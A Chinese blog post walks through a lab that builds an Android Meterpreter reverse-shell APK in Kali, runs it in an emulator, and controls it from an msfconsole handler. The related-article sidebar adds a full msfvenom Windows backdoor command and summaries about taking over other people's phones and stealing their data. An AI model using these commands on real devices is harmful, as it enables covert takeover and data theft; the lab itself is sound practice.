MSF模拟渗透测试之攻击Android

已于 2023-01-20 10:48:52 修改
阅读量7.1k 收藏 14
点赞数 3
分类专栏: MFS渗透测试 文章标签: 测试工具 运维开发
于 2022-04-09 21:57:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124068685
版权

MSF模拟渗透测试之攻击Android

文章目录

前言

一、生成一个test.apk文件

在kali上生成test.apk文件
在这里插入图片描述
ls查看文件所在位置,在桌面复制到主机桌面
在主机下载逍遥模拟器
安装好后,点击右边的安装,安装test.apk文件后,出现MainActivity图标
在这里插入图片描述

二、在kali中打开监听,进行提权

1.打开kali,进行监听

(1)打开msfvenom
使用监听模块
use exploit/multi/handler
设置payload
set payload android/meterpreter/reverse_tcp
在这里插入图片描述
options
设置ip,端口
set lhost 192.168.222.131
setlport 4554
run后,出现会话
在这里插入图片描述
返回会话,提权成功。

2.返回会话,进行提权

输入?
查看可用信息
app_list,查看手机上安装的app
在这里插入图片描述
输入app_run com.android.browser
打开手机端的浏览器

在这里插入图片描述
打开成功,实验结束。

总结

本次实验MSF对Android端进行生成payload,获取对方的会话,进行提权的过程也是一次简单的对Android的渗透测试攻击。

炫彩@之星
关注
专栏目录
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 306
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
热门推荐
m0_74914256的博客
05-05 2万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1324
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
安卓客户端渗透
最新发布
Time_worm的博客
08-09 913
安卓客户端渗透目前来说已经是CTF中一个非常重要的分类了,但是通常的它更多的是二进制层面的博弈,如果仅仅是在apk中注入后门可能非常简单,但通常需要的是一系列的攻击手段来辅助完成的。关于渗透思路,可以将payload注入到正常的apk中,构建一个钓鱼wifi,比如说设置一个没有密码的钓鱼wifi,需要下载软件才能正常上网,用户下载运行软件后即被远程控制。
msf渗透安卓
weixin_30872499的博客
05-29 556
/*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //开启模块 show options //查看参数设置...
MSF渗透测试android手机
永远是少年
06-15 5052
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机。 一、Android木马生成 二、Android木马安装 三、效果检验
使用msf工具对安卓手机进行渗透攻击———超详细
weixin_71669458的博客
07-28 1万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
MSF入侵安卓手机
2301_77162959的博客
07-11 1355
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
移动端渗透测试框架MSF
09-24
移动安全框架MSF(Mobile Security Framework - MobSF)是一个全面的、开源的渗透测试和安全分析平台,专门针对移动应用,如Android和iOS应用程序。它为安全专家提供了自动化静态和动态分析工具,帮助他们在开发周期...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4496
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
渗透测试方法论与实践
渗透测试(Penetration Testing)是一种安全测试方法,旨在模拟黑客攻击,评估信息系统的安全性。通过模拟攻击来发现系统中存在的弱点与漏洞,并提出改进建议,以加强系统的安全防护能力。渗透测试旨在帮助组织发现...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3916
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
Metasploit(msf)系列-利用浏览器漏洞渗透提权
chaojixiaojingang
09-20 4723
         我最近在学习Kali系统msf框架的使用,怎样利用浏览器漏洞渗透提权,现在我就把学习到的一点小成果展示出来。在此之前我要先介绍本次利用的漏洞是ms10_018,想具体了解该漏洞可以参考:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-018 Metasploit概述: ...
MSF和永恒之蓝&渗透安卓手机
niqiu320的博客
04-23 2268
Metasploit简介 Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 它提供了多个基本的用户接口,包括终端、命令行、图形化等,一般我们使用较多的是终端MSF和图形化的Armitage 它分为社区版和商业版 qpt-get update apt-get install metasploit-framework MSF框架是由多个模块组成的,具体的模块
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1031
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2441
使用msfvenom生成木马控制手机
Kali利用MSF渗透安卓手机_kali入侵安卓手机,网易严选网络安全开发三面面经
m0_60607397的博客
04-05 1788
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
msf渗透手机(操作手机系统)
xss2001999的博客
11-09 516
msf渗透智能手机(安卓系统)
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值